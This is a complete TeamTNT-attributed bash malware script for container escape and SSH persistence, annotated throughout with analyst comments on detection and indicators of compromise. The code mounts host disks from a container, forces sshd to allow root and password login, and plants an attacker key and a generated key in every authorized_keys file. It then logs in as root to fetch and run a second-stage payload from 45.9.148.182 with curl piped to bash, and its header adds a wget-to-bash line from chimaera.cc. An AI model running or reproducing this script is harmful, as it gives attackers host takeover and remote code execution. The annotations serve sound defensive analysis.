#!/bin/bash
#
#	TITLE:		Chimaera_ALL_IN_ON_NGROK_SCRIPT
#	AUTOR:		hilde@teamtnt.red
#	VERSION:	Chimaera_stable_V0.00.1
#	DATE:		01.09.2021
#
#	SRC:        wget -O- http://chimaera.cc/sh/MOUNTSPLOIT_V2.sh.txt | bash
#				wget http://chimaera.cc/sh/MOUNTSPLOIT_V2.sh.txt -O /var/tmp/.ms2
#				bash /var/tmp/.ms2
#
########################################################################

# Analyst note: best-effort installation of bash and an OpenSSH package through
# whichever package manager is present (apk, apt-get or yum). stderr is discarded
# on every command, so the managers that are absent fail without output.
# The apk line installs openssh-client; the apt-get and yum lines install
# openssh-server.
# Detection: a package manager pulling SSH tooling inside an already-running
# container is unusual for most workloads and worth alerting on.
apk add bash openssh-client 2>/dev/null
apt-get update --fix-missing 2>/dev/null; apt-get install -y bash openssh-server 2>/dev/null
yum install -y bash openssh-server 2>/dev/null


# Analyst note: hard-coded SSH public key whose comment field (hilde@teamtnt.red)
# matches the address in the file header. Further down it is appended to every
# authorized_keys / authorized_keys2 file found under /.host/.
# IoC: search authorized_keys files for this key material or its comment field.
IDRSA_PUBKEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow== hilde@teamtnt.red'




# Analyst note: SSH_OPTIONS rewrites every sshd_config found under /.host/ so that
# root login, password authentication and public-key authentication are all set
# to "yes".
# Globals:   none read; works through scratch files /var/tmp/sshconfig.dat and
#            /var/tmp/sshconfig.txt, both removed before returning.
# Arguments: none.
# NOTE(review): no call to this function appears in the visible part of the
# script, and nothing here restarts or reloads sshd.
# Detection: file-integrity monitoring on sshd_config; audit for
# "PermitRootLogin yes" / "PasswordAuthentication yes" that config management
# did not set.
function SSH_OPTIONS(){
# Collect candidate sshd_config paths and de-duplicate them.
find /.host/ -name sshd_config 2>/dev/null >> /var/tmp/sshconfig.dat
cat /var/tmp/sshconfig.dat | sort -u >> /var/tmp/sshconfig.txt
rm -f /var/tmp/sshconfig.dat

# sed's "c\" command replaces each whole line that contains the keyword, so any
# line mentioning the directive (commented-out ones included) becomes the new
# setting.
while read SSHDCONFIGFILE; do
sed -i '/PermitRootLogin/c\PermitRootLogin yes' $SSHDCONFIGFILE
sed -i '/PasswordAuthentication/c\PasswordAuthentication yes' $SSHDCONFIGFILE
sed -i '/PubkeyAuthentication/c\PubkeyAuthentication yes' $SSHDCONFIGFILE
done < /var/tmp/sshconfig.txt
rm -f /var/tmp/sshconfig.txt

}





# Analyst note: block-device discovery and mounting.
# Device nodes are taken from the first column of `fdisk -lu` (lines containing
# /dev/ that are not "Disk" summary lines) and from the "LV Path" field of
# `lvdisplay`, de-duplicated through scratch files in /var/tmp, and /.host/ is
# created as the mount root.
# NOTE(review): mounting block devices from inside a container presumably
# requires device access plus mount privilege (e.g. a privileged container) --
# confirm against the affected workload's security context.
# Mitigation: avoid privileged containers and host device exposure; alert on
# fdisk/lvdisplay/mount execution inside containers.
fdisk -lu | grep '/dev/' | grep -v Disk | awk '{print $1}' >> /var/tmp/dev_path.dat
lvdisplay 2>/dev/null | grep 'LV Path' | awk '{print $3}' >> /var/tmp/dev_path.dat
cat /var/tmp/dev_path.dat | sort -u >> /var/tmp/dev_path.txt
rm -f /var/tmp/dev_path.dat
mkdir -p /.host/


# For each device path, the sed expression strips everything through the last
# slash, leaving the final path component as the directory name; the device is
# then mounted at /.host/<name>.
while read DEV_PATH; do
DIRNAME=$(echo $DEV_PATH | sed -e 's/\/.*\///g')
mkdir -p /.host/$DIRNAME
mount $DEV_PATH /.host/$DIRNAME
done < /var/tmp/dev_path.txt
rm -f /var/tmp/dev_path.txt



# Analyst note: SSH key persistence on the mounted filesystems.
# Every authorized_keys and authorized_keys2 file below /.host/ is located and
# the list is de-duplicated into /var/tmp/auth.dat.
# Detection: file-integrity monitoring on authorized_keys* files; look for
# entries carrying the comment field hilde@teamtnt.red or keys that no
# provisioning system issued.
find /.host/ -name authorized_keys 2>/dev/null >> /var/tmp/auth
find /.host/ -name authorized_keys2 2>/dev/null >> /var/tmp/auth
cat /var/tmp/auth | sort -u >> /var/tmp/auth.dat
rm -f /var/tmp/auth

# Generate a local key pair with an empty passphrase unless /root/id_rsa already
# exists; the private half is used for the ssh login at the end of the script.
if [ ! -f "/root/id_rsa" ]; then ssh-keygen -f /root/id_rsa -N "" ; fi



# Append two keys to every file found: the hard-coded IDRSA_PUBKEY and the
# public half of the pair generated above.
while read AUTHKEYFILE; do
echo $IDRSA_PUBKEY >> $AUTHKEYFILE
cat /root/id_rsa.pub >> $AUTHKEYFILE
done < /var/tmp/auth.dat
rm -f /var/tmp/auth.dat


# Analyst note: second persistence path, taken when /host/ exists. This is a
# different directory from the /.host/ mount root used above.
# NOTE(review): /host/ is presumably a host filesystem exposed to the container
# (e.g. a hostPath volume) -- confirm against the affected workload's spec.
if [ -d "/host/" ]; then
# chattr -ia clears the immutable and append-only attributes so the key files
# can be written; errors are discarded.
chattr -ia / /host/ /host/root/ /host/root/.ssh/ /host/root/.ssh/authorized_keys /host/root/.ssh/authorized_keys2 2>/dev/null
mkdir -p /host/root/.ssh/ 2>/dev/null
# The generated public key is appended to authorized_keys and overwrites
# authorized_keys2.
cat /root/id_rsa.pub >> /host/root/.ssh/authorized_keys
cat /root/id_rsa.pub > /host/root/.ssh/authorized_keys2
# SSH_PORT is taken from the second field of sshd_config lines containing "Port ".
export SSH_PORT=$(cat /host/etc/ssh/sshd_config | grep "Port " | awk '{print $2}')




fi

# Fall back to port 22 when no port was read.
if [ -z "$SSH_PORT" ]; then export SSH_PORT=22; fi

# Logs in as root over loopback with the generated key (no host-key check, no
# password prompt, 5-second connect timeout) and runs a second-stage script
# fetched with curl and piped to bash.
# NOTE(review): 127.0.0.1 reaches the host's sshd only if the container shares
# the host network namespace -- confirm.
# IoCs on this page: 45.9.148.182, /cmd/Kubernetes_root_PayLoad_2.sh, and
# chimaera.cc in the file header.
# Detection/mitigation: alert on root SSH logins originating from 127.0.0.1 and
# on `curl ... | bash` process chains; restrict container egress to known
# destinations.
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i /root/id_rsa root@127.0.0.1 -p$SSH_PORT "nohup curl http://45.9.148.182/cmd/Kubernetes_root_PayLoad_2.sh | bash &"








